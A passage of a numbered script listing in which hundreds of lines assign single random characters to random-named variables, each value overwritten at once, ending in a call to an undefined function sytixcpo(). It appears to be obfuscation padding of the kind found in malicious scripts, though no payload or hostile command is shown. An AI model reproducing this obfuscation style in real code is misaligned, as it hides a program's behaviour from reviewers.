731 | hlqiy = "b"; | |
732 | hlqiy = "L"; | |
733 | hlqiy = "Y"; | |
734 | hlqiy = "l"; | |
735 | hlqiy = "A"; | |
736 | hlqiy = "c"; | |
737 | hlqiy = "o"; | |
738 | hlqiy = "Q"; | |
739 | hlqiy = "S"; | |
740 | hlqiy = "M"; | |
741 | hlqiy = "k"; | |
742 | hlqiy = "d"; | |
743 | hlqiy = "U"; | |
744 | hlqiy = "O"; | |
745 | hlqiy = "s"; | |
746 | hlqiy = "Y"; | |
747 | hlqiy = "q"; | |
748 | hlqiy = "I"; | |
749 | hlqiy = "b"; | |
750 | hlqiy = "l"; | |
751 | hlqiy = "C"; | |
752 | hlqiy = "K"; | |
753 | hlqiy = "E"; | |
754 | hlqiy = "e"; | |
755 | hlqiy = "@"; | |
756 | tkseudkyc = "g"; | |
757 | tkseudkyc = "w"; | |
758 | tkseudkyc = "Y"; | |
759 | tkseudkyc = "H"; | |
760 | tkseudkyc = "K"; | |
761 | tkseudkyc = "S"; | |
762 | tkseudkyc = "d"; | |
763 | tkseudkyc = "I"; | |
764 | tkseudkyc = "z"; | |
765 | tkseudkyc = "W"; | |
766 | tkseudkyc = "a"; | |
767 | tkseudkyc = "f"; | |
768 | tkseudkyc = "z"; | |
769 | tkseudkyc = "Z"; | |
770 | tkseudkyc = "B"; | |
771 | tkseudkyc = "o"; | |
772 | tkseudkyc = "h"; | |
773 | tkseudkyc = "d"; | |
774 | tkseudkyc = "w"; | |
775 | tkseudkyc = "F"; | |
776 | tkseudkyc = "m"; | |
777 | tkseudkyc = "O"; | |
778 | tkseudkyc = "b"; | |
779 | tkseudkyc = "l"; | |
780 | tkseudkyc = "P"; | |
781 | tkseudkyc = "E"; | |
782 | tycwm = "J"; | |
783 | tycwm = "z"; | |
784 | tycwm = "f"; | |
785 | tycwm = "W"; | |
786 | tycwm = "l"; | |
787 | tycwm = "P"; | |
788 | tycwm = "m"; | |
789 | tycwm = "E"; | |
790 | tycwm = "c"; | |
791 | tycwm = "P"; | |
792 | tycwm = "S"; | |
793 | tycwm = "t"; | |
794 | tycwm = "C"; | |
795 | tycwm = "p"; | |
796 | tycwm = "F"; | |
797 | tycwm = "R"; | |
798 | tycwm = "f"; | |
799 | tycwm = "s"; | |
800 | tycwm = "F"; | |
801 | tycwm = "r"; | |
802 | tycwm = "I"; | |
803 | tycwm = "t"; | |
804 | tycwm = "b"; | |
805 | tycwm = "t"; | |
806 | tycwm = "E"; | |
807 | tycwm = "L"; | |
808 | tycwm = "E"; | |
809 | tycwm = "p"; | |
810 | tycwm = "v"; | |
811 | tycwm = "P"; | |
812 | tycwm = "T"; | |
813 | tycwm = "J"; | |
814 | tycwm = "v"; | |
815 | tycwm = "B"; | |
816 | tycwm = "o"; | |
817 | tycwm = "d"; | |
818 | tycwm = "o"; | |
819 | uzfgkhzi = "W"; | |
820 | uzfgkhzi = "I"; | |
821 | uzfgkhzi = "i"; | |
822 | uzfgkhzi = "i"; | |
823 | uzfgkhzi = "o"; | |
824 | uzfgkhzi = "b"; | |
825 | uzfgkhzi = "q"; | |
826 | uzfgkhzi = "Q"; | |
827 | uzfgkhzi = "f"; | |
828 | uzfgkhzi = "i"; | |
829 | uzfgkhzi = "f"; | |
830 | uzfgkhzi = "m"; | |
831 | uzfgkhzi = "F"; | |
832 | uzfgkhzi = "l"; | |
833 | ugbtsk = "C"; | |
834 | ugbtsk = "k"; | |
835 | ugbtsk = "d"; | |
836 | ugbtsk = "n"; | |
837 | ugbtsk = "s"; | |
838 | ugbtsk = "j"; | |
839 | ugbtsk = "t"; | |
840 | ugbtsk = "J"; | |
841 | ugbtsk = "P"; | |
842 | ugbtsk = "V"; | |
843 | ugbtsk = "u"; | |
844 | ugbtsk = "V"; | |
845 | ugbtsk = "x"; | |
846 | ugbtsk = "z"; | |
847 | ugbtsk = "a"; | |
848 | ugbtsk = "p"; | |
849 | ugbtsk = "T"; | |
850 | ugbtsk = "W"; | |
851 | ugbtsk = "o"; | |
852 | ugbtsk = "Z"; | |
853 | ugbtsk = "u"; | |
854 | qsxrtdui = "v"; | |
855 | qsxrtdui = "p"; | |
856 | qsxrtdui = "i"; | |
857 | qsxrtdui = "a"; | |
858 | qsxrtdui = "o"; | |
859 | qsxrtdui = "8"; | |
860 | beupuf = "e"; | |
861 | beupuf = "w"; | |
862 | beupuf = "t"; | |
863 | beupuf = "L"; | |
864 | beupuf = "m"; | |
865 | beupuf = "Z"; | |
866 | beupuf = "N"; | |
867 | beupuf = "Q"; | |
868 | beupuf = "F"; | |
869 | beupuf = "i"; | |
870 | beupuf = "h"; | |
871 | beupuf = "Q"; | |
872 | beupuf = "q"; | |
873 | beupuf = "P"; | |
874 | beupuf = "H"; | |
875 | beupuf = "Y"; | |
876 | beupuf = "v"; | |
877 | beupuf = "f"; | |
878 | beupuf = "j"; | |
879 | beupuf = "V"; | |
880 | beupuf = "c"; | |
881 | beupuf = "h"; | |
882 | beupuf = "H"; | |
883 | beupuf = "Z"; | |
884 | beupuf = "n"; | |
885 | beupuf = "r"; | |
886 | beupuf = "Z"; | |
887 | beupuf = "s"; | |
888 | beupuf = "n"; | |
889 | beupuf = "S"; | |
890 | beupuf = "o"; | |
891 | beupuf = "f"; | |
892 | beupuf = ":"; | |
893 | txsxrbpl = "W"; | |
894 | txsxrbpl = "z"; | |
895 | txsxrbpl = "c"; | |
896 | txsxrbpl = "x"; | |
897 | txsxrbpl = "L"; | |
898 | txsxrbpl = "Q"; | |
899 | txsxrbpl = "t"; | |
900 | txsxrbpl = "R"; | |
901 | txsxrbpl = "S"; | |
902 | txsxrbpl = "m"; | |
903 | txsxrbpl = "W"; | |
904 | txsxrbpl = "k"; | |
905 | txsxrbpl = "R"; | |
906 | txsxrbpl = "v"; | |
907 | txsxrbpl = "e"; | |
908 | txsxrbpl = "a"; | |
909 | txsxrbpl = "k"; | |
910 | txsxrbpl = "L"; | |
911 | txsxrbpl = "h"; | |
912 | txsxrbpl = "z"; | |
913 | txsxrbpl = "K"; | |
914 | txsxrbpl = "y"; | |
915 | txsxrbpl = "R"; | |
916 | txsxrbpl = "a"; | |
917 | txsxrbpl = "u"; | |
918 | txsxrbpl = "G"; | |
919 | txsxrbpl = "h"; | |
920 | txsxrbpl = "Z"; | |
921 | txsxrbpl = "l"; | |
922 | txsxrbpl = "s"; | |
923 | txsxrbpl = "e"; | |
924 | txsxrbpl = "x"; | |
925 | txsxrbpl = "F"; | |
926 | txsxrbpl = "w"; | |
927 | txsxrbpl = "M"; | |
928 | txsxrbpl = "k"; | |
929 | txsxrbpl = "p"; | |
930 | txsxrbpl = "x"; | |
931 | txsxrbpl = "R"; | |
932 | txsxrbpl = "i"; | |
933 | txsxrbpl = "Y"; | |
934 | txsxrbpl = "L"; | |
935 | txsxrbpl = "o"; | |
936 | txsxrbpl = "q"; | |
937 | txsxrbpl = "1"; | |
938 | oxqnq = "C"; | |
939 | oxqnq = "M"; | |
940 | oxqnq = "G"; | |
941 | oxqnq = "t"; | |
942 | oxqnq = "M"; | |
943 | oxqnq = "F"; | |
944 | oxqnq = "x"; | |
945 | oxqnq = "A"; | |
946 | oxqnq = "e"; | |
947 | oxqnq = "K"; | |
948 | oxqnq = "P"; | |
949 | oxqnq = "Z"; | |
950 | oxqnq = "v"; | |
951 | oxqnq = "r"; | |
952 | oxqnq = "D"; | |
953 | oxqnq = "f"; | |
954 | oxqnq = "E"; | |
955 | oxqnq = "O"; | |
956 | dljzgakls = "Z"; | |
957 | dljzgakls = "w"; | |
958 | dljzgakls = "Q"; | |
959 | dljzgakls = "x"; | |
960 | dljzgakls = "t"; | |
961 | dljzgakls = "h"; | |
962 | eeynrd = "R"; | |
963 | eeynrd = "W"; | |
964 | eeynrd = "P"; | |
965 | eeynrd = "y"; | |
966 | eeynrd = "y"; | |
967 | eeynrd = "Z"; | |
968 | eeynrd = "q"; | |
969 | eeynrd = "a"; | |
970 | eeynrd = "d"; | |
971 | eeynrd = "V"; | |
972 | eeynrd = "W"; | |
973 | eeynrd = "w"; | |
974 | eeynrd = "B"; | |
975 | eeynrd = "b"; | |
976 | eeynrd = "G"; | |
977 | eeynrd = "W"; | |
978 | eeynrd = "L"; | |
979 | eeynrd = "i"; | |
980 | eeynrd = "d"; | |
981 | eeynrd = "c"; | |
982 | eeynrd = "o"; | |
983 | eeynrd = "T"; | |
984 | eeynrd = "M"; | |
985 | eeynrd = "S"; | |
986 | eeynrd = "O"; | |
987 | eeynrd = "G"; | |
988 | eeynrd = "t"; | |
989 | eeynrd = "y"; | |
990 | eeynrd = "R"; | |
991 | eeynrd = "t"; | |
992 | eeynrd = "k"; | |
993 | eeynrd = "X"; | |
994 | eeynrd = "f"; | |
995 | eeynrd = "e"; | |
996 | eeynrd = "Q"; | |
997 | eeynrd = "g"; | |
998 | khwveq = "f"; | |
999 | khwveq = "M"; | |
1000 | khwveq = "x"; | |
1001 | khwveq = "L"; | |
1002 | khwveq = "S"; | |
1003 | khwveq = "Q"; | |
1004 | khwveq = "Q"; | |
1005 | khwveq = "w"; | |
1006 | khwveq = "c"; | |
1007 | khwveq = "N"; | |
1008 | khwveq = "h"; | |
1009 | khwveq = "V"; | |
1010 | khwveq = "a"; | |
1011 | khwveq = "W"; | |
1012 | khwveq = "S"; | |
1013 | khwveq = "t"; | |
1014 | khwveq = "m"; | |
1015 | khwveq = "f"; | |
1016 | khwveq = "p"; | |
1017 | khwveq = "H"; | |
1018 | khwveq = "G"; | |
1019 | khwveq = "R"; | |
1020 | khwveq = "D"; | |
1021 | khwveq = "v"; | |
1022 | khwveq = "0"; | |
1023 | buavm = "v"; | |
1024 | buavm = "v"; | |
1025 | buavm = "H"; | |
1026 | buavm = "v"; | |
1027 | buavm = "R"; | |
1028 | buavm = "k"; | |
1029 | buavm = "B"; | |
1030 | buavm = "Q"; | |
1031 | buavm = "h"; | |
1032 | buavm = "l"; | |
1033 | buavm = "L"; | |
1034 | buavm = "k"; | |
1035 | buavm = "j"; | |
1036 | buavm = "T"; | |
1037 | buavm = "k"; | |
1038 | buavm = "z"; | |
1039 | buavm = "j"; | |
1040 | buavm = "W"; | |
1041 | buavm = "p"; | |
1042 | buavm = "i"; | |
1043 | buavm = "d"; | |
1044 | buavm = "Z"; | |
1045 | buavm = "J"; | |
1046 | buavm = "H"; | |
1047 | buavm = "Q"; | |
1048 | buavm = "H"; | |
1049 | buavm = "S"; | |
1050 | buavm = "i"; | |
1051 | buavm = "o"; | |
1052 | buavm = "m"; | |
1053 | buavm = "y"; | |
1054 | buavm = "f"; | |
1055 | buavm = "L"; | |
1056 | buavm = "W"; | |
1057 | buavm = "v"; | |
1058 | buavm = "X"; | |
1059 | buavm = "h"; | |
1060 | buavm = "c"; | |
1061 | buavm = "d"; | |
1062 | buavm = "I"; | |
1063 | gaeacdic = "b"; | |
1064 | gaeacdic = "B"; | |
1065 | gaeacdic = "x"; | |
1066 | gaeacdic = "C"; | |
1067 | gaeacdic = "z"; | |
1068 | gaeacdic = "Q"; | |
1069 | gaeacdic = "D"; | |
1070 | gaeacdic = "x"; | |
1071 | gaeacdic = "W"; | |
1072 | gaeacdic = "u"; | |
1073 | gaeacdic = "F"; | |
1074 | gaeacdic = "a"; | |
1075 | gaeacdic = "k"; | |
1076 | gaeacdic = "C"; | |
1077 | gaeacdic = "I"; | |
1078 | gaeacdic = "u"; | |
1079 | gaeacdic = "w"; | |
1080 | gaeacdic = "N"; | |
1081 | gaeacdic = "Q"; | |
1082 | gaeacdic = "r"; | |
1083 | gaeacdic = "d"; | |
1084 | gaeacdic = "U"; | |
1085 | gaeacdic = "i"; | |
1086 | gaeacdic = "Y"; | |
1087 | gaeacdic = "m"; | |
1088 | gaeacdic = "x"; | |
1089 | gaeacdic = "G"; | |
1090 | gaeacdic = "n"; | |
1091 | jgweovo = "Z"; | |
1092 | jgweovo = "W"; | |
1093 | syyvu = "W"; | |
1094 | syyvu = "R"; | |
1095 | txsprtivg = "I"; | |
1096 | txsprtivg = "f"; | |
1097 | txsprtivg = "k"; | |
1098 | txsprtivg = "X"; | |
1099 | txsprtivg = "A"; | |
1100 | txsprtivg = "s"; | |
1101 | txsprtivg = "b"; | |
1102 | txsprtivg = "l"; | |
1103 | txsprtivg = "E"; | |
1104 | txsprtivg = "A"; | |
1105 | txsprtivg = "g"; | |
1106 | txsprtivg = "E"; | |
1107 | txsprtivg = "o"; | |
1108 | txsprtivg = "x"; | |
1109 | txsprtivg = "M"; | |
1110 | txsprtivg = "m"; | |
1111 | gqsurl = "N"; | |
1112 | gqsurl = "m"; | |
1113 | gqsurl = "n"; | |
1114 | gqsurl = "c"; | |
1115 | gqsurl = "A"; | |
1116 | gqsurl = "M"; | |
1117 | gqsurl = "K"; | |
1118 | gqsurl = "x"; | |
1119 | gqsurl = "y"; | |
1120 | gqsurl = "V"; | |
1121 | gqsurl = "y"; | |
1122 | gqsurl = "j"; | |
1123 | gqsurl = "I"; | |
1124 | gqsurl = "b"; | |
1125 | gqsurl = "M"; | |
1126 | gqsurl = "A"; | |
1127 | gqsurl = "o"; | |
1128 | gqsurl = "R"; | |
1129 | gqsurl = "n"; | |
1130 | gqsurl = "L"; | |
1131 | gqsurl = "e"; | |
1132 | gqsurl = "Y"; | |
1133 | gqsurl = "t"; | |
1134 | gqsurl = "X"; | |
1135 | gqsurl = "G"; | |
1136 | gqsurl = "j"; | |
1137 | gqsurl = "z"; | |
1138 | gqsurl = "Q"; | |
1139 | gqsurl = "p"; | |
1140 | gqsurl = "S"; | |
1141 | gqsurl = "m"; | |
1142 | gqsurl = "C"; | |
1143 | mrplodk = "r"; | |
1144 | mrplodk = "V"; | |
1145 | mrplodk = "V"; | |
1146 | mrplodk = "E"; | |
1147 | mrplodk = "O"; | |
1148 | mrplodk = "e"; | |
1149 | mrplodk = "e"; | |
1150 | mrplodk = "n"; | |
1151 | mrplodk = "u"; | |
1152 | mrplodk = "z"; | |
1153 | mrplodk = "p"; | |
1154 | mrplodk = "g"; | |
1155 | mrplodk = "o"; | |
1156 | mrplodk = "L"; | |
1157 | mrplodk = "B"; | |
1158 | mrplodk = "E"; | |
1159 | mrplodk = "v"; | |
1160 | lytznrxir = "F"; | |
1161 | lytznrxir = "l"; | |
1162 | lytznrxir = "D"; | |
1163 | lytznrxir = "C"; | |
1164 | lytznrxir = "p"; | |
1165 | lytznrxir = "a"; | |
1166 | lytznrxir = "T"; | |
1167 | lytznrxir = "P"; | |
1168 | lytznrxir = "f"; | |
1169 | lytznrxir = "m"; | |
1170 | lytznrxir = "V"; | |
1171 | lytznrxir = "A"; | |
1172 | lytznrxir = "f"; | |
1173 | lytznrxir = "m"; | |
1174 | lytznrxir = "M"; | |
1175 | lytznrxir = "c"; | |
1176 | lytznrxir = "A"; | |
1177 | lytznrxir = "y"; | |
1178 | lytznrxir = "L"; | |
1179 | lytznrxir = "t"; | |
1180 | lytznrxir = "d"; | |
1181 | lytznrxir = "N"; | |
1182 | lytznrxir = "v"; | |
1183 | lytznrxir = "A"; | |
1184 | lytznrxir = "g"; | |
1185 | lytznrxir = "b"; | |
1186 | lytznrxir = "a"; | |
1187 | fobmkncwt = "T"; | |
1188 | fobmkncwt = "M"; | |
1189 | fobmkncwt = "y"; | |
1190 | fobmkncwt = "D"; | |
1191 | fobmkncwt = "K"; | |
1192 | fobmkncwt = "B"; | |
1193 | fobmkncwt = "h"; | |
1194 | fobmkncwt = "e"; | |
1195 | fobmkncwt = "i"; | |
1196 | zzuvna = "V"; | |
1197 | zzuvna = "S"; | |
1198 | zzuvna = "u"; | |
1199 | zzuvna = "k"; | |
1200 | zzuvna = "X"; | |
1201 | zzuvna = "d"; | |
1202 | zzuvna = "h"; | |
1203 | zzuvna = "t"; | |
1204 | zzuvna = "I"; | |
1205 | zzuvna = "F"; | |
1206 | zzuvna = "t"; | |
1207 | zzuvna = "d"; | |
1208 | zzuvna = "C"; | |
1209 | zzuvna = "h"; | |
1210 | zzuvna = "H"; | |
1211 | iwqdlcqbp = "a"; | |
1212 | iwqdlcqbp = "L"; | |
1213 | iwqdlcqbp = "L"; | |
1214 | iwqdlcqbp = "P"; | |
1215 | iwqdlcqbp = "x"; | |
1216 | iwqdlcqbp = "L"; | |
1217 | iwqdlcqbp = "y"; | |
1218 | iwqdlcqbp = "G"; | |
1219 | iwqdlcqbp = "l"; | |
1220 | iwqdlcqbp = "L"; | |
1221 | iwqdlcqbp = "t"; | |
1222 | iwqdlcqbp = "g"; | |
1223 | iwqdlcqbp = "I"; | |
1224 | iwqdlcqbp = "c"; | |
1225 | iwqdlcqbp = "I"; | |
1226 | iwqdlcqbp = "Q"; | |
1227 | iwqdlcqbp = "z"; | |
1228 | iwqdlcqbp = "b"; | |
1229 | iwqdlcqbp = "n"; | |
1230 | iwqdlcqbp = "W"; | |
1231 | iwqdlcqbp = "n"; | |
1232 | iwqdlcqbp = "R"; | |
1233 | iwqdlcqbp = "h"; | |
1234 | iwqdlcqbp = "c"; | |
1235 | iwqdlcqbp = "d"; | |
1236 | gpmzwqi = "e"; | |
1237 | gpmzwqi = "f"; | |
1238 | gpmzwqi = "J"; | |
1239 | gpmzwqi = "e"; | |
1240 | gpmzwqi = "b"; | |
1241 | gpmzwqi = "f"; | |
1242 | gpmzwqi = "b"; | |
1243 | wssxk = "H"; | |
1244 | wssxk = "C"; | |
1245 | wssxk = "F"; | |
1246 | wssxk = "x"; | |
1247 | wssxk = "D"; | |
1248 | wssxk = "W"; | |
1249 | wssxk = "A"; | |
1250 | wssxk = "e"; | |
1251 | wssxk = "s"; | |
1252 | wssxk = "V"; | |
1253 | wssxk = "l"; | |
1254 | wssxk = "V"; | |
1255 | wssxk = "x"; | |
1256 | btuqkv = "k"; | |
1257 | btuqkv = "I"; | |
1258 | btuqkv = "p"; | |
1259 | btuqkv = "X"; | |
1260 | btuqkv = "Z"; | |
1261 | btuqkv = "n"; | |
1262 | btuqkv = "Q"; | |
1263 | btuqkv = "a"; | |
1264 | btuqkv = "r"; | |
1265 | btuqkv = "U"; | |
1266 | btuqkv = "p"; | |
1267 | btuqkv = "N"; | |
1268 | btuqkv = "J"; | |
1269 | btuqkv = "I"; | |
1270 | btuqkv = "h"; | |
1271 | btuqkv = "k"; | |
1272 | btuqkv = "&"; | |
1273 | htfgffr = "T"; | |
1274 | htfgffr = "B"; | |
1275 | htfgffr = "c"; | |
1276 | htfgffr = "N"; | |
1277 | htfgffr = "C"; | |
1278 | htfgffr = "u"; | |
1279 | htfgffr = "i"; | |
1280 | htfgffr = "v"; | |
1281 | htfgffr = "I"; | |
1282 | htfgffr = "H"; | |
1283 | htfgffr = "Y"; | |
1284 | htfgffr = "Y"; | |
1285 | htfgffr = "R"; | |
1286 | htfgffr = "y"; | |
1287 | htfgffr = "X"; | |
1288 | htfgffr = "S"; | |
1289 | htfgffr = "N"; | |
1290 | htfgffr = "p"; | |
1291 | htfgffr = "N"; | |
1292 | htfgffr = "w"; | |
1293 | htfgffr = "y"; | |
1294 | htfgffr = "u"; | |
1295 | htfgffr = "a"; | |
1296 | htfgffr = "A"; | |
1297 | htfgffr = "Q"; | |
1298 | htfgffr = "z"; | |
1299 | htfgffr = "W"; | |
1300 | htfgffr = "i"; | |
1301 | htfgffr = "e"; | |
1302 | htfgffr = "O"; | |
1303 | htfgffr = "D"; | |
1304 | htfgffr = "i"; | |
1305 | htfgffr = "u"; | |
1306 | htfgffr = "V"; | |
1307 | htfgffr = "p"; | |
1308 | alwxvsda = "K"; | |
1309 | alwxvsda = "v"; | |
1310 | alwxvsda = "x"; | |
1311 | alwxvsda = "y"; | |
1312 | alwxvsda = "i"; | |
1313 | alwxvsda = "N"; | |
1314 | alwxvsda = "O"; | |
1315 | alwxvsda = "S"; | |
1316 | alwxvsda = "U"; | |
1317 | alwxvsda = "g"; | |
1318 | alwxvsda = "v"; | |
1319 | alwxvsda = "H"; | |
1320 | alwxvsda = "z"; | |
1321 | alwxvsda = "h"; | |
1322 | alwxvsda = "g"; | |
1323 | alwxvsda = "J"; | |
1324 | alwxvsda = "l"; | |
1325 | alwxvsda = "r"; | |
1326 | alwxvsda = "q"; | |
1327 | alwxvsda = "M"; | |
1328 | alwxvsda = "q"; | |
1329 | alwxvsda = "O"; | |
1330 | alwxvsda = "p"; | |
1331 | alwxvsda = "n"; | |
1332 | alwxvsda = "Y"; | |
1333 | alwxvsda = "L"; | |
1334 | alwxvsda = "K"; | |
1335 | alwxvsda = "l"; | |
1336 | alwxvsda = "u"; | |
1337 | alwxvsda = "Q"; | |
1338 | alwxvsda = "T"; | |
1339 | alwxvsda = "z"; | |
1340 | alwxvsda = "X"; | |
1341 | alwxvsda = "R"; | |
1342 | alwxvsda = "z"; | |
1343 | alwxvsda = "R"; | |
1344 | alwxvsda = "A"; | |
1345 | alwxvsda = "t"; | |
1346 | alwxvsda = "k"; | |
1347 | alwxvsda = "Q"; | |
1348 | alwxvsda = "S"; | |
1349 | strzcl = "t"; | |
1350 | strzcl = "d"; | |
1351 | strzcl = "E"; | |
1352 | strzcl = "t"; | |
1353 | strzcl = "R"; | |
1354 | strzcl = "K"; | |
1355 | strzcl = "I"; | |
1356 | strzcl = "Q"; | |
1357 | strzcl = "O"; | |
1358 | strzcl = "R"; | |
1359 | strzcl = "n"; | |
1360 | strzcl = "o"; | |
1361 | strzcl = "x"; | |
1362 | strzcl = "G"; | |
1363 | strzcl = "Z"; | |
1364 | strzcl = "t"; | |
1365 | strzcl = "j"; | |
1366 | strzcl = "t"; | |
1367 | strzcl = "m"; | |
1368 | strzcl = "K"; | |
1369 | strzcl = "w"; | |
1370 | strzcl = "N"; | |
1371 | strzcl = "a"; | |
1372 | strzcl = "W"; | |
1373 | strzcl = "j"; | |
1374 | strzcl = "r"; | |
1375 | strzcl = "r"; | |
1376 | strzcl = "j"; | |
1377 | strzcl = "F"; | |
1378 | strzcl = "g"; | |
1379 | strzcl = "w"; | |
1380 | strzcl = "T"; | |
1381 | sytixcpo ( ); |
|